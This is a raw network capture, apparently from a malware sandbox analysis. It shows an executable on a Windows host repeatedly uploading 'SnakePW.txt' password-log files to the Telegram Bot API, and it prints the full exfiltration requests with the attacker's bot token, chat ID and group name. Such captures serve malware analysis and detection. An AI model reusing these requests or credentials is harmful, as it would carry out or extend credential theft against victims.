2024-09-27 10:52:51 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:52:51 GMT Content-Type: application/json Content-Length: 524 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:52:51 UTC	524	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 36 39 30 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 34 33 34 33 37 31 2c 22 64 6f 63 75 Data Ascii: {"ok":true,"result":{"message_id":36904,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727434371,"docu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.7	49738	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:52:51 UTC	359	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dce05c2c7ffa13 Host: api.telegram.org Content-Length: 551 Connection: Keep-Alive
2024-09-27 10:52:51 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 30 35 63 32 63 37 66 66 61 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dce05c2c7ffa13Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:52:52 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:52:52 GMT Content-Type: application/json Content-Length: 524 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:52:52 UTC	524	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 36 39 30 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 34 33 34 33 37 32 2c 22 64 6f 63 75 Data Ascii: {"ok":true,"result":{"message_id":36905,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727434372,"docu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.7	49739	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:52:52 UTC	335	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dce067e6b1439f Host: api.telegram.org Content-Length: 551
2024-09-27 10:52:52 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 30 36 37 65 36 62 31 34 33 39 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dce067e6b1439fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:52:53 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:52:52 GMT Content-Type: application/json Content-Length: 523 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:52:53 UTC	523	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 36 39 30 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 34 33 34 33 37 32 2c 22 64 6f 63 75 Data Ascii: {"ok":true,"result":{"message_id":36906,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727434372,"docu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.7	49740	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:52:53 UTC	359	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dce0739ba9158f Host: api.telegram.org Content-Length: 551 Connection: Keep-Alive
2024-09-27 10:52:53 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 30 37 33 39 62 61 39 31 35 38 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dce0739ba9158fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:52:53 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:52:53 GMT Content-Type: application/json Content-Length: 524 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:52:53 UTC	524	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 36 39 30 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 34 33 34 33 37 33 2c 22 64 6f 63 75 Data Ascii: {"ok":true,"result":{"message_id":36907,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727434373,"docu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.7	49741	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:52:54 UTC	359	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dce07e00d9624d Host: api.telegram.org Content-Length: 551 Connection: Keep-Alive
2024-09-27 10:52:54 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 30 37 65 30 30 64 39 36 32 34 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dce07e00d9624dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:52:54 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:52:54 GMT Content-Type: application/json Content-Length: 523 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:52:54 UTC	523	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 36 39 30 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 34 33 34 33 37 34 2c 22 64 6f 63 75 Data Ascii: {"ok":true,"result":{"message_id":36908,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727434374,"docu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.7	49742	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:52:55 UTC	335	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dce089aabfa005 Host: api.telegram.org Content-Length: 551
2024-09-27 10:52:55 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 30 38 39 61 61 62 66 61 30 30 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dce089aabfa005Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:52:55 UTC	370	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:52:55 GMT Content-Type: application/json Content-Length: 111 Connection: close Retry-After: 25 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:52:55 UTC	111	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 32 35 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 32 35 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 25","parameters":{"retry_after":25}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.7	49743	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:52:56 UTC	359	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dce097e46c3e2e Host: api.telegram.org Content-Length: 551 Connection: Keep-Alive
2024-09-27 10:52:56 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 30 39 37 65 34 36 63 33 65 32 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dce097e46c3e2eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:52:56 UTC	370	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:52:56 GMT Content-Type: application/json Content-Length: 111 Connection: close Retry-After: 24 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:52:56 UTC	111	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 32 34 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 32 34 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 24","parameters":{"retry_after":24}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.7	49744	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:52:57 UTC	335	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dce0a38443fb85 Host: api.telegram.org Content-Length: 551
2024-09-27 10:52:57 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 30 61 33 38 34 34 33 66 62 38 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dce0a38443fb85Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:52:57 UTC	370	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:52:57 GMT Content-Type: application/json Content-Length: 111 Connection: close Retry-After: 23 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:52:57 UTC	111	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 32 33 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 32 33 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 23","parameters":{"retry_after":23}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.7	49745	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:52:58 UTC	359	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dce0af1e69720c Host: api.telegram.org Content-Length: 551 Connection: Keep-Alive
2024-09-27 10:52:58 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 30 61 66 31 65 36 39 37 32 30 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dce0af1e69720cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:52:58 UTC	370	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:52:58 GMT Content-Type: application/json Content-Length: 111 Connection: close Retry-After: 22 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
